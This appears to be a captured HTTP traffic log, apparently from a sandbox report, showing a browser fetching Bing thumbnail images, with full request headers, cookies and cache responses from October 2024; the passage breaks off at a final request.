cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2900
cache-control: public, max-age=497211
date: Thu, 17 Oct 2024 21:04:10 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199050.9b4d337
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.c116cfe2fe98ace9b7cebcbb9da1e762&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.c116cfe2fe98ace9b7cebcbb9da1e762&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3330
cache-control: public, max-age=2484080
date: Thu, 17 Oct 2024 21:04:10 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199050.9b4d338
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.f636c4c2e1a6ef5fea32be196d388ceb&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.f636c4c2e1a6ef5fea32be196d388ceb&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4491
cache-control: public, max-age=1337075
date: Thu, 17 Oct 2024 21:04:10 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199050.9b4d339
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.dc5e1b6c5a033b489e26db65da126925&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSK.dc5e1b6c5a033b489e26db65da126925&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4189
cache-control: public, max-age=1433749
date: Thu, 17 Oct 2024 21:04:10 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199050.9b4d335
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSAAS.1E7F31C31270779522692CDDFF032077&w=72&h=72&c=1&rs=1&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OSAAS.1E7F31C31270779522692CDDFF032077&w=72&h=72&c=1&rs=1&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1395
x-check-cacheable: YES
cache-control: public, max-age=580928
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b50f68
GET

https://th.bing.com/th?id=ODLS.6bf1f262-d2eb-4d01-870d-1392ba7beb72&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.6bf1f262-d2eb-4d01-870d-1392ba7beb72&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 944
cache-control: public, max-age=623152
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5120b
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.112859d1-6d69-4703-8442-728a546ab4f4&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.112859d1-6d69-4703-8442-728a546ab4f4&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 584
cache-control: public, max-age=2477591
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MEM_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51213
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.TTDR-j141HlnF_4uNDXv_gAAAA&w=80&h=80&c=1&vt=10&bgcl=372a20&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

